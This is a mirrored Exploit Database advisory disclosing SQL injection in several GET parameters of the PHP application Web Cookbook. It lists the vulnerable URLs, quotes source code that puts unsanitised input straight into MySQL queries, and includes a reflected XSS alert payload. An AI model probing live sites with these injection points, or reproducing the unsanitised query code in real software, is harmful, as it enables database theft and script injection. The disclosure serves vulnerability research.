Web Cookbook – Multiple SQL Injections

• Exploit Database
• 11 阅读

• 作者： Saadat Ullah
  日期： 2013-03-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24742/

• # Exploit Title: Web Cookbook Multiple SQL Injection
  # Date: 2013/3/12
  # Exploit Author: Saadat Ullah ， saadi_linux@rocketmail.com
  # Software Link: http://sourceforge.net/projects/webcookbook/
  # Author HomePage: http://security-geeks.blogspot.com/
  # Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3
  
  # SQL Injection
  
  http://localhost/cook/searchrecipe.php?sstring=[SQLi]
  http://localhost/cook/showtext.php?mode=[SQLi]
  http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
  
  
  http://localhost/cook/showtext.php?mode=[SQLi]
  #Proof Of Concept
  In showtext.php
  Code:
  $mode = $_GET["mode"];
  .
  .
  showText($mode, $art);//sending $mode to a function without sanitizing it
  .
  .
  function showText($kategorie, $art) {
  	initDB();
  	echo "<div class=\"rdisplay\">\n";
  	$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
  	$result = mysql_query($query);
  .
  .
  All GET Fields Are Vuln To SQLi
  http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
  #p0c
  In searchrecipe.php
  	$title = $_GET['title'];
  	$prefix = $_GET['prefix'];
  	$preparation = $_GET['preparation'];
  	$postfix = $_GET['postfix'];
  	$tipp = $_GET['tipp'];
  	$ingredient = $_GET['ingredient'];
  	.
  	.
  	.
  	if ($title != "") {
  		$sstring = "a.title LIKE '%$title%' ";
  	}
  	.
  	.
  	searchRecipe($mode, $sstring);
  	.
  	.
  	In Function SearchRecipe
  				$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
  
  
  http://localhost/cook/searchrecipe.php?sstring=[SQLi]
  P0c
  $sstring = $_GET['sstring'];
  		if ($sstring != "") {
  			searchRecipe(0, $sstring);
  .
  .
  .
  	$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
  
  
  A simple Non-Presistent XSS
  http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=
  
  
  #Independent Pakistani Security Researcher